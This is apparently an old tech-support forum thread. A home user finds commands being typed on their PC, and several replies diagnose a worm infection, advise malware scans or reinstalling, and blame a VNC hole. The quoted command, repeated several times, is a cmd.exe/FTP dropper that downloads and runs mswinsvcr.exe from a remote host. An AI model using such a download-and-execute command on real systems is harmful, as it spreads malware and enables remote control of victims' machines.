PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo open

[Guest]

Hi, please help me. I work from home and for a while now i'm getting this
message anywhere the cursor is, so I opened notepad and was able to catched
entirely as follow:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message it's always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

 

[John John]

I think that you may have a backdoor worm or someone is trying to hack
your box. By searching on "mswinsvcr.exe" I came up with these
possibilities:

WORM/IrcBot.uxm
WORM/Rbot.Gen

These things will monitor your activity and if you go to places like
paypal they will capture your account and password information then the
thieves may be able to use the information to commit fraud.

John

 

[Malke]

Hi, please help me. I work from home and for a while now i'm getting this
message anywhere the cursor is, so I opened notepad and was able to catched
entirely as follow:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message it's always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

Your machine is infected. Take it off any networks and clean it up.

http://www.google.com/search?hl=en&q=mswinsvcr.exe&btnG=Google+Search

Go through these general malware removal steps systematically -
http://www.elephantboycomputers.com/page2.html#Removing_Malware

Include scanning with David Lipman's Multi_AV and follow instructions to
do all scans in Safe Mode. After you've done the scanning with David's
utility, if you don't have a current version antivirus (not earlier than
2006) get one such as Avast and install it, update its definitions, and
do a thorough scan with it in Safe Mode.

http://www.elephantboycomputers.com/page2.html#Multi-AV - instructions
http://www.pctipp.ch/downloads/sicherheit/35905/multi_av_scanning_tool.html
- download site

The site is in German but David's tool is in English so don't let that
worry you. Scroll all the way down to almost the bottom of the page and
you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool".
You'll see "Download von www pctipp.ch" and the live link to download
Multi_AV.

When all else fails, run HijackThis and post your log in one of the
specialty forums listed at the first link above (not here, please).

Standard caveat: If the procedures look too complex - and there is no
shame in admitting this isn't your cup of tea - take the machine to a
professional computer repair shop (not your local version of
BigComputerStore/GeekSquad). Please be aware that not all local shops
are skilled at removing malware and even if they are, your computer may
be so infested that Windows will need to be clean-installed. Have all
your data backed up before you take the machine into a shop.



Malke

 

[Guest]

Hi Malke:

Wow, very detailed and useful information there. I will try it.
I'm not an expert but I built my pc and I think I can follow the steps.

But the big question is: I do have antispyware, firewall and antivirus from
mcafee with the 24/7 auto online updates and my scans twice a week are clean,
not even a cookie there since i clean it and delete it manually, from IE and
the Java folders at the end of every single day. How?

And the sad part is that my client technical support told me Mcafee don't
have a cure!!!

So I guess I'm on my own.
I will check all that you sugested and if I can't clean it I will go with a
fresh reformat. and a xp install.

Thank you,
-
Isabella

 

[Jim]

Hi Malke:

Wow, very detailed and useful information there. I will try it.
I'm not an expert but I built my pc and I think I can follow the steps.

But the big question is: I do have antispyware, firewall and antivirus
from
mcafee with the 24/7 auto online updates and my scans twice a week are
clean,
not even a cookie there since i clean it and delete it manually, from IE
and
the Java folders at the end of every single day. How?

And the sad part is that my client technical support told me Mcafee don't
have a cure!!!

So I guess I'm on my own.
I will check all that you sugested and if I can't clean it I will go with
a
fresh reformat. and a xp install.

Thank you,
-
Isabella

Now you know why a lot of people don't care for McAfee....
I would get David Lipman's Multi-AV package, but I don't have a good address
for it at hand.
Jim

 

[Ace]

In all honesty, in view of some of the replies you have already
received.. I would not bother with cleaning.
The longer you work on your machine, the more time you give whoever has
control of your machine to steal more of your personal data.
Unplug from the 'net, backup your documents, reformat, reinstall.
Scan the backup with a good updated virus scanner before you use it.

 

[ZachIRC]

Hi, please help me. I work from home and for a while now i'm getting this
message anywhere the cursor is, so I opened notepad and was able to catched
entirely as follow:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message it's always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

Do you have VNC? If so get the latest version or remove it. There is a
vurln in it to let bots connect. [The typing you see]

 

[lcscury]

this is for sure VNC

Hi, please help me. I work from home and for a while now i'm getting this
message anywhere the cursor is, so I opened notepad and was able to catched
entirely as follow:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message it's always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

Do you have VNC? If so get the latest version or remove it. There is a
vurln in it to let bots connect. [The typing you see]